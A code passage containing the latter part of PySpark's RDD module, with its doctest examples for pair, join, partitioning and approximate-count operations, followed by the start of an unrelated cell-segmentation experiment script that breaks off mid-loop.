>>> sc.parallelize([1, 2, 'spark', 'rdd']).saveAsPickleFile(tmpFile.name, 3)
>>> sorted(sc.pickleFile(tmpFile.name, 5).map(str).collect())
['1', '2', 'rdd', 'spark']
"""
if batchSize == 0:
ser = AutoBatchedSerializer(PickleSerializer())
else:
ser = BatchedSerializer(PickleSerializer(), batchSize)
self._reserialize(ser)._jrdd.saveAsObjectFile(path)
@ignore_unicode_prefix
def saveAsTextFile(self, path, compressionCodecClass=None):
"""
Save this RDD as a text file, using string representations of elements.
@param path: path to text file
@param compressionCodecClass: (None by default) string i.e.
"org.apache.hadoop.io.compress.GzipCodec"
>>> tempFile = NamedTemporaryFile(delete=True)
>>> tempFile.close()
>>> sc.parallelize(range(10)).saveAsTextFile(tempFile.name)
>>> from fileinput import input
>>> from glob import glob
>>> ''.join(sorted(input(glob(tempFile.name + "/part-0000*"))))
'0\\n1\\n2\\n3\\n4\\n5\\n6\\n7\\n8\\n9\\n'
Empty lines are tolerated when saving to text files.
>>> tempFile2 = NamedTemporaryFile(delete=True)
>>> tempFile2.close()
>>> sc.parallelize(['', 'foo', '', 'bar', '']).saveAsTextFile(tempFile2.name)
>>> ''.join(sorted(input(glob(tempFile2.name + "/part-0000*"))))
'\\n\\n\\nbar\\nfoo\\n'
Using compressionCodecClass
>>> tempFile3 = NamedTemporaryFile(delete=True)
>>> tempFile3.close()
>>> codec = "org.apache.hadoop.io.compress.GzipCodec"
>>> sc.parallelize(['foo', 'bar']).saveAsTextFile(tempFile3.name, codec)
>>> from fileinput import input, hook_compressed
>>> result = sorted(input(glob(tempFile3.name + "/part*.gz"), openhook=hook_compressed))
>>> b''.join(result).decode('utf-8')
u'bar\\nfoo\\n'
"""
def func(split, iterator):
for x in iterator:
if not isinstance(x, (unicode, bytes)):
x = unicode(x)
if isinstance(x, unicode):
x = x.encode("utf-8")
yield x
keyed = self.mapPartitionsWithIndex(func)
keyed._bypass_serializer = True
if compressionCodecClass:
compressionCodec = self.ctx._jvm.java.lang.Class.forName(compressionCodecClass)
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path, compressionCodec)
else:
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path)
# Pair functions
def collectAsMap(self):
"""
Return the key-value pairs in this RDD to the master as a dictionary.
>>> m = sc.parallelize([(1, 2), (3, 4)]).collectAsMap()
>>> m[1]
2
>>> m[3]
4
"""
return dict(self.collect())
def keys(self):
"""
Return an RDD with the keys of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).keys()
>>> m.collect()
[1, 3]
"""
return self.map(lambda x: x[0])
def values(self):
"""
Return an RDD with the values of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).values()
>>> m.collect()
[2, 4]
"""
return self.map(lambda x: x[1])
def reduceByKey(self, func, numPartitions=None, partitionFunc=portable_hash):
"""
Merge the values for each key using an associative reduce function.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
Output will be partitioned with C{numPartitions} partitions, or
the default parallelism level if C{numPartitions} is not specified.
Default partitioner is hash-partition.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKey(add).collect())
[('a', 2), ('b', 1)]
"""
return self.combineByKey(lambda x: x, func, func, numPartitions, partitionFunc)
def reduceByKeyLocally(self, func):
"""
Merge the values for each key using an associative reduce function, but
return the results immediately to the master as a dictionary.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKeyLocally(add).items())
[('a', 2), ('b', 1)]
"""
def reducePartition(iterator):
m = {}
for k, v in iterator:
m[k] = func(m[k], v) if k in m else v
yield m
def mergeMaps(m1, m2):
for k, v in m2.items():
m1[k] = func(m1[k], v) if k in m1 else v
return m1
return self.mapPartitions(reducePartition).reduce(mergeMaps)
def countByKey(self):
"""
Count the number of elements for each key, and return the result to the
master as a dictionary.
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.countByKey().items())
[('a', 2), ('b', 1)]
"""
return self.map(lambda x: x[0]).countByValue()
def join(self, other, numPartitions=None):
"""
Return an RDD containing all pairs of elements with matching keys in
C{self} and C{other}.
Each pair of elements will be returned as a (k, (v1, v2)) tuple, where
(k, v1) is in C{self} and (k, v2) is in C{other}.
Performs a hash join across the cluster.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("a", 3)])
>>> sorted(x.join(y).collect())
[('a', (1, 2)), ('a', (1, 3))]
"""
return python_join(self, other, numPartitions)
def leftOuterJoin(self, other, numPartitions=None):
"""
Perform a left outer join of C{self} and C{other}.
For each element (k, v) in C{self}, the resulting RDD will either
contain all pairs (k, (v, w)) for w in C{other}, or the pair
(k, (v, None)) if no elements in C{other} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(x.leftOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None))]
"""
return python_left_outer_join(self, other, numPartitions)
def rightOuterJoin(self, other, numPartitions=None):
"""
Perform a right outer join of C{self} and C{other}.
For each element (k, w) in C{other}, the resulting RDD will either
contain all pairs (k, (v, w)) for v in this, or the pair (k, (None, w))
if no elements in C{self} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(y.rightOuterJoin(x).collect())
[('a', (2, 1)), ('b', (None, 4))]
"""
return python_right_outer_join(self, other, numPartitions)
def fullOuterJoin(self, other, numPartitions=None):
"""
Perform a right outer join of C{self} and C{other}.
For each element (k, v) in C{self}, the resulting RDD will either
contain all pairs (k, (v, w)) for w in C{other}, or the pair
(k, (v, None)) if no elements in C{other} have key k.
Similarly, for each element (k, w) in C{other}, the resulting RDD will
either contain all pairs (k, (v, w)) for v in C{self}, or the pair
(k, (None, w)) if no elements in C{self} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("c", 8)])
>>> sorted(x.fullOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None)), ('c', (None, 8))]
"""
return python_full_outer_join(self, other, numPartitions)
# TODO: add option to control map-side combining
# portable_hash is used as default, because builtin hash of None is different
# cross machines.
def partitionBy(self, numPartitions, partitionFunc=portable_hash):
"""
Return a copy of the RDD partitioned using the specified partitioner.
>>> pairs = sc.parallelize([1, 2, 3, 4, 2, 4, 1]).map(lambda x: (x, x))
>>> sets = pairs.partitionBy(2).glom().collect()
>>> len(set(sets[0]).intersection(set(sets[1])))
0
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
partitioner = Partitioner(numPartitions, partitionFunc)
if self.partitioner == partitioner:
return self
# Transferring O(n) objects to Java is too expensive.
# Instead, we'll form the hash buckets in Python,
# transferring O(numPartitions) objects to Java.
# Each object is a (splitNumber, [objects]) pair.
# In order to avoid too huge objects, the objects are
# grouped into chunks.
outputSerializer = self.ctx._unbatched_serializer
limit = (_parse_memory(self.ctx._conf.get(
"spark.python.worker.memory", "512m")) / 2)
def add_shuffle_key(split, iterator):
buckets = defaultdict(list)
c, batch = 0, min(10 * numPartitions, 1000)
for k, v in iterator:
buckets[partitionFunc(k) % numPartitions].append((k, v))
c += 1
# check used memory and avg size of chunk of objects
if (c % 1000 == 0 and get_used_memory() > limit
or c > batch):
n, size = len(buckets), 0
for split in list(buckets.keys()):
yield pack_long(split)
d = outputSerializer.dumps(buckets[split])
del buckets[split]
yield d
size += len(d)
avg = int(size / n) >> 20
# let 1M < avg < 10M
if avg < 1:
batch *= 1.5
elif avg > 10:
batch = max(int(batch / 1.5), 1)
c = 0
for split, items in buckets.items():
yield pack_long(split)
yield outputSerializer.dumps(items)
keyed = self.mapPartitionsWithIndex(add_shuffle_key, preservesPartitioning=True)
keyed._bypass_serializer = True
with SCCallSiteSync(self.context) as css:
pairRDD = self.ctx._jvm.PairwiseRDD(
keyed._jrdd.rdd()).asJavaPairRDD()
jpartitioner = self.ctx._jvm.PythonPartitioner(numPartitions,
id(partitionFunc))
jrdd = self.ctx._jvm.PythonRDD.valueOfPair(pairRDD.partitionBy(jpartitioner))
rdd = RDD(jrdd, self.ctx, BatchedSerializer(outputSerializer))
rdd.partitioner = partitioner
return rdd
# TODO: add control over map-side aggregation
def combineByKey(self, createCombiner, mergeValue, mergeCombiners,
numPartitions=None, partitionFunc=portable_hash):
"""
Generic function to combine the elements for each key using a custom
set of aggregation functions.
Turns an RDD[(K, V)] into a result of type RDD[(K, C)], for a "combined
type" C. Note that V and C can be different -- for example, one might
group an RDD of type (Int, Int) into an RDD of type (Int, List[Int]).
Users provide three functions:
- C{createCombiner}, which turns a V into a C (e.g., creates
a one-element list)
- C{mergeValue}, to merge a V into a C (e.g., adds it to the end of
a list)
- C{mergeCombiners}, to combine two C's into a single one.
In addition, users can control the partitioning of the output RDD.
>>> x = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> def add(a, b): return a + str(b)
>>> sorted(x.combineByKey(str, add, add).collect())
[('a', '11'), ('b', '1')]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
serializer = self.ctx.serializer
memory = self._memory_limit()
agg = Aggregator(createCombiner, mergeValue, mergeCombiners)
def combineLocally(iterator):
merger = ExternalMerger(agg, memory * 0.9, serializer)
merger.mergeValues(iterator)
return merger.items()
locally_combined = self.mapPartitions(combineLocally, preservesPartitioning=True)
shuffled = locally_combined.partitionBy(numPartitions, partitionFunc)
def _mergeCombiners(iterator):
merger = ExternalMerger(agg, memory, serializer)
merger.mergeCombiners(iterator)
return merger.items()
return shuffled.mapPartitions(_mergeCombiners, preservesPartitioning=True)
def aggregateByKey(self, zeroValue, seqFunc, combFunc, numPartitions=None,
partitionFunc=portable_hash):
"""
Aggregate the values of each key, using given combine functions and a neutral
"zero value". This function can return a different result type, U, than the type
of the values in this RDD, V. Thus, we need one operation for merging a V into
a U and one operation for merging two U's, The former operation is used for merging
values within a partition, and the latter is used for merging values between
partitions. To avoid memory allocation, both of these functions are
allowed to modify and return their first argument instead of creating a new U.
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(
lambda v: seqFunc(createZero(), v), seqFunc, combFunc, numPartitions, partitionFunc)
def foldByKey(self, zeroValue, func, numPartitions=None, partitionFunc=portable_hash):
"""
Merge the values for each key using an associative function "func"
and a neutral "zeroValue" which may be added to the result an
arbitrary number of times, and must not change the result
(e.g., 0 for addition, or 1 for multiplication.).
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> from operator import add
>>> sorted(rdd.foldByKey(0, add).collect())
[('a', 2), ('b', 1)]
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(lambda v: func(createZero(), v), func, func, numPartitions,
partitionFunc)
def _memory_limit(self):
return _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m"))
# TODO: support variant with custom partitioner
def groupByKey(self, numPartitions=None, partitionFunc=portable_hash):
"""
Group the values for each key in the RDD into a single sequence.
Hash-partitions the resulting RDD with numPartitions partitions.
Note: If you are grouping in order to perform an aggregation (such as a
sum or average) over each key, using reduceByKey or aggregateByKey will
provide much better performance.
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.groupByKey().mapValues(len).collect())
[('a', 2), ('b', 1)]
>>> sorted(rdd.groupByKey().mapValues(list).collect())
[('a', [1, 1]), ('b', [1])]
"""
def createCombiner(x):
return [x]
def mergeValue(xs, x):
xs.append(x)
return xs
def mergeCombiners(a, b):
a.extend(b)
return a
memory = self._memory_limit()
serializer = self._jrdd_deserializer
agg = Aggregator(createCombiner, mergeValue, mergeCombiners)
def combine(iterator):
merger = ExternalMerger(agg, memory * 0.9, serializer)
merger.mergeValues(iterator)
return merger.items()
locally_combined = self.mapPartitions(combine, preservesPartitioning=True)
shuffled = locally_combined.partitionBy(numPartitions, partitionFunc)
def groupByKey(it):
merger = ExternalGroupBy(agg, memory, serializer)
merger.mergeCombiners(it)
return merger.items()
return shuffled.mapPartitions(groupByKey, True).mapValues(ResultIterable)
def flatMapValues(self, f):
"""
Pass each value in the key-value pair RDD through a flatMap function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["x", "y", "z"]), ("b", ["p", "r"])])
>>> def f(x): return x
>>> x.flatMapValues(f).collect()
[('a', 'x'), ('a', 'y'), ('a', 'z'), ('b', 'p'), ('b', 'r')]
"""
flat_map_fn = lambda kv: ((kv[0], x) for x in f(kv[1]))
return self.flatMap(flat_map_fn, preservesPartitioning=True)
def mapValues(self, f):
"""
Pass each value in the key-value pair RDD through a map function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["apple", "banana", "lemon"]), ("b", ["grapes"])])
>>> def f(x): return len(x)
>>> x.mapValues(f).collect()
[('a', 3), ('b', 1)]
"""
map_values_fn = lambda kv: (kv[0], f(kv[1]))
return self.map(map_values_fn, preservesPartitioning=True)
def groupWith(self, other, *others):
"""
Alias for cogroup but with support for multiple RDDs.
>>> w = sc.parallelize([("a", 5), ("b", 6)])
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> z = sc.parallelize([("b", 42)])
>>> [(x, tuple(map(list, y))) for x, y in sorted(list(w.groupWith(x, y, z).collect()))]
[('a', ([5], [1], [2], [])), ('b', ([6], [4], [], [42]))]
"""
return python_cogroup((self, other) + others, numPartitions=None)
# TODO: add variant with custom parittioner
def cogroup(self, other, numPartitions=None):
"""
For each key k in C{self} or C{other}, return a resulting RDD that
contains a tuple with the list of values for that key in C{self} as
well as C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> [(x, tuple(map(list, y))) for x, y in sorted(list(x.cogroup(y).collect()))]
[('a', ([1], [2])), ('b', ([4], []))]
"""
return python_cogroup((self, other), numPartitions)
def sampleByKey(self, withReplacement, fractions, seed=None):
"""
Return a subset of this RDD sampled by key (via stratified sampling).
Create a sample of this RDD using variable sampling rates for
different keys as specified by fractions, a key to sampling rate map.
>>> fractions = {"a": 0.2, "b": 0.1}
>>> rdd = sc.parallelize(fractions.keys()).cartesian(sc.parallelize(range(0, 1000)))
>>> sample = dict(rdd.sampleByKey(False, fractions, 2).groupByKey().collect())
>>> 100 < len(sample["a"]) < 300 and 50 < len(sample["b"]) < 150
True
>>> max(sample["a"]) <= 999 and min(sample["a"]) >= 0
True
>>> max(sample["b"]) <= 999 and min(sample["b"]) >= 0
True
"""
for fraction in fractions.values():
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(
RDDStratifiedSampler(withReplacement, fractions, seed).func, True)
def subtractByKey(self, other, numPartitions=None):
"""
Return each (key, value) pair in C{self} that has no pair with matching
key in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 2)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtractByKey(y).collect())
[('b', 4), ('b', 5)]
"""
def filter_func(pair):
key, (val1, val2) = pair
return val1 and not val2
return self.cogroup(other, numPartitions).filter(filter_func).flatMapValues(lambda x: x[0])
def subtract(self, other, numPartitions=None):
"""
Return each value in C{self} that is not contained in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 3)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtract(y).collect())
[('a', 1), ('b', 4), ('b', 5)]
"""
# note: here 'True' is just a placeholder
rdd = other.map(lambda x: (x, True))
return self.map(lambda x: (x, True)).subtractByKey(rdd, numPartitions).keys()
def keyBy(self, f):
"""
Creates tuples of the elements in this RDD by applying C{f}.
>>> x = sc.parallelize(range(0,3)).keyBy(lambda x: x*x)
>>> y = sc.parallelize(zip(range(0,5), range(0,5)))
>>> [(x, list(map(list, y))) for x, y in sorted(x.cogroup(y).collect())]
[(0, [[0], [0]]), (1, [[1], [1]]), (2, [[], [2]]), (3, [[], [3]]), (4, [[2], [4]])]
"""
return self.map(lambda x: (f(x), x))
def repartition(self, numPartitions):
"""
Return a new RDD that has exactly numPartitions partitions.
Can increase or decrease the level of parallelism in this RDD.
Internally, this uses a shuffle to redistribute data.
If you are decreasing the number of partitions in this RDD, consider
using `coalesce`, which can avoid performing a shuffle.
>>> rdd = sc.parallelize([1,2,3,4,5,6,7], 4)
>>> sorted(rdd.glom().collect())
[[1], [2, 3], [4, 5], [6, 7]]
>>> len(rdd.repartition(2).glom().collect())
2
>>> len(rdd.repartition(10).glom().collect())
10
"""
jrdd = self._jrdd.repartition(numPartitions)
return RDD(jrdd, self.ctx, self._jrdd_deserializer)
def coalesce(self, numPartitions, shuffle=False):
"""
Return a new RDD that is reduced into `numPartitions` partitions.
>>> sc.parallelize([1, 2, 3, 4, 5], 3).glom().collect()
[[1], [2, 3], [4, 5]]
>>> sc.parallelize([1, 2, 3, 4, 5], 3).coalesce(1).glom().collect()
[[1, 2, 3, 4, 5]]
"""
jrdd = self._jrdd.coalesce(numPartitions)
return RDD(jrdd, self.ctx, self._jrdd_deserializer)
def zip(self, other):
"""
Zips this RDD with another one, returning key-value pairs with the
first element in each RDD second element in each RDD, etc. Assumes
that the two RDDs have the same number of partitions and the same
number of elements in each partition (e.g. one was made through
a map on the other).
>>> x = sc.parallelize(range(0,5))
>>> y = sc.parallelize(range(1000, 1005))
>>> x.zip(y).collect()
[(0, 1000), (1, 1001), (2, 1002), (3, 1003), (4, 1004)]
"""
def get_batch_size(ser):
if isinstance(ser, BatchedSerializer):
return ser.batchSize
return 1 # not batched
def batch_as(rdd, batchSize):
return rdd._reserialize(BatchedSerializer(PickleSerializer(), batchSize))
my_batch = get_batch_size(self._jrdd_deserializer)
other_batch = get_batch_size(other._jrdd_deserializer)
if my_batch != other_batch or not my_batch:
# use the smallest batchSize for both of them
batchSize = min(my_batch, other_batch)
if batchSize <= 0:
# auto batched or unlimited
batchSize = 100
other = batch_as(other, batchSize)
self = batch_as(self, batchSize)
if self.getNumPartitions() != other.getNumPartitions():
raise ValueError("Can only zip with RDD which has the same number of partitions")
# There will be an Exception in JVM if there are different number
# of items in each partitions.
pairRDD = self._jrdd.zip(other._jrdd)
deserializer = PairDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(pairRDD, self.ctx, deserializer)
def zipWithIndex(self):
"""
Zips this RDD with its element indices.
The ordering is first based on the partition index and then the
ordering of items within each partition. So the first item in
the first partition gets index 0, and the last item in the last
partition receives the largest index.
This method needs to trigger a spark job when this RDD contains
more than one partitions.
>>> sc.parallelize(["a", "b", "c", "d"], 3).zipWithIndex().collect()
[('a', 0), ('b', 1), ('c', 2), ('d', 3)]
"""
starts = [0]
if self.getNumPartitions() > 1:
nums = self.mapPartitions(lambda it: [sum(1 for i in it)]).collect()
for i in range(len(nums) - 1):
starts.append(starts[-1] + nums[i])
def func(k, it):
for i, v in enumerate(it, starts[k]):
yield v, i
return self.mapPartitionsWithIndex(func)
def zipWithUniqueId(self):
"""
Zips this RDD with generated unique Long ids.
Items in the kth partition will get ids k, n+k, 2*n+k, ..., where
n is the number of partitions. So there may exist gaps, but this
method won't trigger a spark job, which is different from
L{zipWithIndex}
>>> sc.parallelize(["a", "b", "c", "d", "e"], 3).zipWithUniqueId().collect()
[('a', 0), ('b', 1), ('c', 4), ('d', 2), ('e', 5)]
"""
n = self.getNumPartitions()
def func(k, it):
for i, v in enumerate(it):
yield v, i * n + k
return self.mapPartitionsWithIndex(func)
def name(self):
"""
Return the name of this RDD.
"""
n = self._jrdd.name()
if n:
return n
@ignore_unicode_prefix
def setName(self, name):
"""
Assign a name to this RDD.
>>> rdd1 = sc.parallelize([1, 2])
>>> rdd1.setName('RDD1').name()
u'RDD1'
"""
self._jrdd.setName(name)
return self
def toDebugString(self):
"""
A description of this RDD and its recursive dependencies for debugging.
"""
debug_string = self._jrdd.toDebugString()
if debug_string:
return debug_string.encode('utf-8')
def getStorageLevel(self):
"""
Get the RDD's current storage level.
>>> rdd1 = sc.parallelize([1,2])
>>> rdd1.getStorageLevel()
StorageLevel(False, False, False, False, 1)
>>> print(rdd1.getStorageLevel())
Serialized 1x Replicated
"""
java_storage_level = self._jrdd.getStorageLevel()
storage_level = StorageLevel(java_storage_level.useDisk(),
java_storage_level.useMemory(),
java_storage_level.useOffHeap(),
java_storage_level.deserialized(),
java_storage_level.replication())
return storage_level
def _defaultReducePartitions(self):
"""
Returns the default number of partitions to use during reduce tasks (e.g., groupBy).
If spark.default.parallelism is set, then we'll use the value from SparkContext
defaultParallelism, otherwise we'll use the number of partitions in this RDD.
This mirrors the behavior of the Scala Partitioner#defaultPartitioner, intended to reduce
the likelihood of OOMs. Once PySpark adopts Partitioner-based APIs, this behavior will
be inherent.
"""
if self.ctx._conf.contains("spark.default.parallelism"):
return self.ctx.defaultParallelism
else:
return self.getNumPartitions()
def lookup(self, key):
"""
Return the list of values in the RDD for key `key`. This operation
is done efficiently if the RDD has a known partitioner by only
searching the partition that the key maps to.
>>> l = range(1000)
>>> rdd = sc.parallelize(zip(l, l), 10)
>>> rdd.lookup(42) # slow
[42]
>>> sorted = rdd.sortByKey()
>>> sorted.lookup(42) # fast
[42]
>>> sorted.lookup(1024)
[]
>>> rdd2 = sc.parallelize([(('a', 'b'), 'c')]).groupByKey()
>>> list(rdd2.lookup(('a', 'b'))[0])
['c']
"""
values = self.filter(lambda kv: kv[0] == key).values()
if self.partitioner is not None:
return self.ctx.runJob(values, lambda x: x, [self.partitioner(key)])
return values.collect()
def _to_java_object_rdd(self):
""" Return an JavaRDD of Object by unpickling
It will convert each Python object into Java object by Pyrolite, whenever the
RDD is serialized in batch or not.
"""
rdd = self._pickled()
return self.ctx._jvm.SerDeUtil.pythonToJava(rdd._jrdd, True)
def countApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate version of count() that returns a potentially incomplete
result within a timeout, even if not all tasks have finished.
>>> rdd = sc.parallelize(range(1000), 10)
>>> rdd.countApprox(1000, 1.0)
1000
"""
drdd = self.mapPartitions(lambda it: [float(sum(1 for i in it))])
return int(drdd.sumApprox(timeout, confidence))
def sumApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate operation to return the sum within a timeout
or meet the confidence.
>>> rdd = sc.parallelize(range(1000), 10)
>>> r = sum(range(1000))
>>> abs(rdd.sumApprox(1000) - r) / r < 0.05
True
"""
jrdd = self.mapPartitions(lambda it: [float(sum(it))])._to_java_object_rdd()
jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
r = jdrdd.sumApprox(timeout, confidence).getFinalValue()
return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
def meanApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate operation to return the mean within a timeout
or meet the confidence.
>>> rdd = sc.parallelize(range(1000), 10)
>>> r = sum(range(1000)) / 1000.0
>>> abs(rdd.meanApprox(1000) - r) / r < 0.05
True
"""
jrdd = self.map(float)._to_java_object_rdd()
jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
r = jdrdd.meanApprox(timeout, confidence).getFinalValue()
return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
def countApproxDistinct(self, relativeSD=0.05):
"""
.. note:: Experimental
Return approximate number of distinct elements in the RDD.
The algorithm used is based on streamlib's implementation of
"HyperLogLog in Practice: Algorithmic Engineering of a State
of The Art Cardinality Estimation Algorithm", available
<a href="http://dx.doi.org/10.1145/2452376.2452456">here</a>.
:param relativeSD: Relative accuracy. Smaller values create
counters that require more space.
It must be greater than 0.000017.
>>> n = sc.parallelize(range(1000)).map(str).countApproxDistinct()
>>> 900 < n < 1100
True
>>> n = sc.parallelize([i % 20 for i in range(1000)]).countApproxDistinct()
>>> 16 < n < 24
True
"""
if relativeSD < 0.000017:
raise ValueError("relativeSD should be greater than 0.000017")
# the hash space in Java is 2^32
hashRDD = self.map(lambda x: portable_hash(x) & 0xFFFFFFFF)
return hashRDD._to_java_object_rdd().countApproxDistinct(relativeSD)
def toLocalIterator(self):
"""
Return an iterator that contains all of the elements in this RDD.
The iterator will consume as much memory as the largest partition in this RDD.
>>> rdd = sc.parallelize(range(10))
>>> [x for x in rdd.toLocalIterator()]
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
"""
for partition in range(self.getNumPartitions()):
rows = self.context.runJob(self, lambda x: x, [partition])
for row in rows:
yield row
def _prepare_for_python_RDD(sc, command, obj=None):
# the serialized command will be compressed by broadcast
ser = CloudPickleSerializer()
pickled_command = ser.dumps(command)
if len(pickled_command) > (1 << 20): # 1M
# The broadcast will have same life cycle as created PythonRDD
broadcast = sc.broadcast(pickled_command)
pickled_command = ser.dumps(broadcast)
# There is a bug in py4j.java_gateway.JavaClass with auto_convert
# https://github.com/bartdag/py4j/issues/161
# TODO: use auto_convert once py4j fix the bug
broadcast_vars = ListConverter().convert(
[x._jbroadcast for x in sc._pickled_broadcast_vars],
sc._gateway._gateway_client)
sc._pickled_broadcast_vars.clear()
env = MapConverter().convert(sc.environment, sc._gateway._gateway_client)
includes = ListConverter().convert(sc._python_includes, sc._gateway._gateway_client)
return pickled_command, broadcast_vars, env, includes
class PipelinedRDD(RDD):
"""
Pipelined maps:
>>> rdd = sc.parallelize([1, 2, 3, 4])
>>> rdd.map(lambda x: 2 * x).cache().map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
>>> rdd.map(lambda x: 2 * x).map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
Pipelined reduces:
>>> from operator import add
>>> rdd.map(lambda x: 2 * x).reduce(add)
20
>>> rdd.flatMap(lambda x: [x, x]).reduce(add)
20
"""
def __init__(self, prev, func, preservesPartitioning=False):
if not isinstance(prev, PipelinedRDD) or not prev._is_pipelinable():
# This transformation is the first in its stage:
self.func = func
self.preservesPartitioning = preservesPartitioning
self._prev_jrdd = prev._jrdd
self._prev_jrdd_deserializer = prev._jrdd_deserializer
else:
prev_func = prev.func
def pipeline_func(split, iterator):
return func(split, prev_func(split, iterator))
self.func = pipeline_func
self.preservesPartitioning = \
prev.preservesPartitioning and preservesPartitioning
self._prev_jrdd = prev._prev_jrdd # maintain the pipeline
self._prev_jrdd_deserializer = prev._prev_jrdd_deserializer
self.is_cached = False
self.is_checkpointed = False
self.ctx = prev.ctx
self.prev = prev
self._jrdd_val = None
self._id = None
self._jrdd_deserializer = self.ctx.serializer
self._bypass_serializer = False
self.partitioner = prev.partitioner if self.preservesPartitioning else None
def getNumPartitions(self):
return self._prev_jrdd.partitions().size()
@property
def _jrdd(self):
if self._jrdd_val:
return self._jrdd_val
if self._bypass_serializer:
self._jrdd_deserializer = NoOpSerializer()
if self.ctx.profiler_collector:
profiler = self.ctx.profiler_collector.new_profiler(self.ctx)
else:
profiler = None
command = (self.func, profiler, self._prev_jrdd_deserializer,
self._jrdd_deserializer)
pickled_cmd, bvars, env, includes = _prepare_for_python_RDD(self.ctx, command, self)
python_rdd = self.ctx._jvm.PythonRDD(self._prev_jrdd.rdd(),
bytearray(pickled_cmd),
env, includes, self.preservesPartitioning,
self.ctx.pythonExec, self.ctx.pythonVer,
bvars, self.ctx._javaAccumulator)
self._jrdd_val = python_rdd.asJavaRDD()
if profiler:
self._id = self._jrdd_val.id()
self.ctx.profiler_collector.add_profiler(self._id, profiler)
return self._jrdd_val
def id(self):
if self._id is None:
self._id = self._jrdd.id()
return self._id
def _is_pipelinable(self):
return not (self.is_cached or self.is_checkpointed)
def _test():
import doctest
from pyspark.context import SparkContext
globs = globals().copy()
# The small batch size here ensures that we see multiple batches,
# even in these small test examples:
globs['sc'] = SparkContext('local[4]', 'PythonTest')
(failure_count, test_count) = doctest.testmod(
globs=globs, optionflags=doctest.ELLIPSIS)
globs['sc'].stop()
if failure_count:
exit(-1)
if __name__ == "__main__":
_test()
|
experiments.py
|
import os
from sklearn.model_selection import KFold
import numpy as np
from segmentation_functions import cell_segment, masks_to_npy
from gan_model import create_model, rotation, train_representation
import multiprocessing
from generate_figures import figure_8
import matplotlib.pyplot as plt
from matplotlib.pyplot import figure
def cell_segmentation(positive_images_root, negative_images_root, positive_npy_root,
negative_npy_root, ref_path, intensity, multi_core):
'''
Performs cell segmentation on input images
Parameters
----------
positive_images_root : str
path with positive images.
negative_images_root : str
path with negative images.
positive_npy_root : str
path with positive npy file.
negative_npy_root : str
path with negative npy file.
ref_path : str
path with reference image for stain normalization.
intensity : int
intensity for segmentation thresholding.
multi_core : bool, optional
if the process is multi core. The default is True.
Returns
-------
None.
'''
# get paths of positive and negative images
positive_images_path = [positive_images_root + n for n in
os.listdir(positive_images_root)]
negative_images_path = [negative_images_root + n for n in
os.listdir(negative_images_root)]
# create directories
if 1- os.path.exists(positive_npy_root + str(intensity) + '/'):
os.makedirs(positive_npy_root + str(intensity) + '/')
if 1- os.path.exists(negative_npy_root + str(intensity) + '/'):
os.makedirs(negative_npy_root + str(intensity) + '/')
# apply cell segmentation on images
if (multi_core == True and __name__ == '__main__'):
jobs = []
for index, i in enumerate(positive_images_path):
p = multiprocessing.Process(
target=cell_segment, args=(i, positive_npy_root + str(intensity) +
'/', ref_path, intensity))
p.start()
jobs.append(p)
if (index + 1) % 7 == 0:
p.join()
jobs = []
for job in jobs:
p.join()
jobs = []
for index, i in enumerate(negative_images_path):
